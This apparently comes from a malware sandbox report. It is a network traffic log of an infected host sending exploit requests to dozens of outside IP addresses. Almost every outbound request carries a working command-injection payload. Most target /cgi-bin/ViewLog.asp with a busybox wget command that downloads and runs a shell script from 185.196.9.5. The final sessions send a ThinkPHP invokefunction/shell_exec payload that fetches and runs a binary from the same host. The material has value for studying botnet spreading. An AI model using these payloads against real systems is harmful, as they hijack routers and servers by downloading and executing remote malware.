Feb 25, 2024 19:05:18.831275940 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1118	192.168.2.15	55640	94.131.113.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:18.937848091 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:19.163232088 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1119	192.168.2.15	41452	94.121.98.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:18.946849108 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1120	192.168.2.15	56796	31.136.155.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:19.904231071 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.916863918 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:29.060806990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:41.092614889 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1121	192.168.2.15	45898	94.123.138.18	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:19.938991070 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1122	192.168.2.15	54958	95.133.0.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:19.939469099 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:20.165606022 CET	390	IN	HTTP/1.1 400 Bad Request Content-Type: text/html Server: httpd Date: Sun, 25 Feb 2024 18:05:20 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 43 72 6f 73 73 20 53 69 74 65 20 41 63 74 69 6f 6e 20 64 65 74 65 63 74 65 64 21 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>Cross Site Action detected!</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1123	192.168.2.15	60882	62.29.32.194	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:19.950820923 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1124	192.168.2.15	36554	31.24.86.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.024931908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:24.196820021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:30.340897083 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:42.372621059 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1125	192.168.2.15	38358	94.120.173.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.381233931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1126	192.168.2.15	45272	31.200.76.76	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.385085106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1127	192.168.2.15	52026	95.66.220.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.385508060 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1128	192.168.2.15	54978	95.133.0.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.396851063 CET	427	IN	HTTP/1.1 408 Request Timeout Content-Type: text/html Server: httpd Date: Sun, 25 Feb 2024 18:05:20 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 6f 75 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 61 70 70 65 61 72 65 64 20 77 69 74 68 69 6e 20 61 20 72 65 61 73 6f 6e 61 62 6c 65 20 74 69 6d 65 20 70 65 72 69 6f 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>408 Request Timeout</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>408 Request Timeout</H4>No request appeared within a reasonable time period.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1129	192.168.2.15	54290	95.31.119.52	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:20.636107922 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:20.949353933 CET	476	IN	HTTP/1.1 404 Not Found Date: Mon, 26 Feb 2024 04:01:17 GMT Server: Webs X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1;mode=block Cache-Control: no-store Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1130	192.168.2.15	36764	31.136.207.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:21.136976957 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:21.732845068 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:22.884728909 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:25.220858097 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:29.828795910 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:39.044553041 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1131	192.168.2.15	50824	85.222.127.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:21.172907114 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1132	192.168.2.15	54048	94.120.36.106	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:21.178903103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1133	192.168.2.15	44558	94.120.245.151	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:21.179804087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1134	192.168.2.15	33844	95.101.97.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:21.605753899 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:05:21.838294983 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:05:21 GMT Date: Sun, 25 Feb 2024 18:05:21 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 34 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 38 38 38 34 33 32 31 26 23 34 36 3b 34 36 34 38 65 36 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.94341060.1708884321.4648e61</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1135	192.168.2.15	45470	95.217.234.159	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:05:22.020848989 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
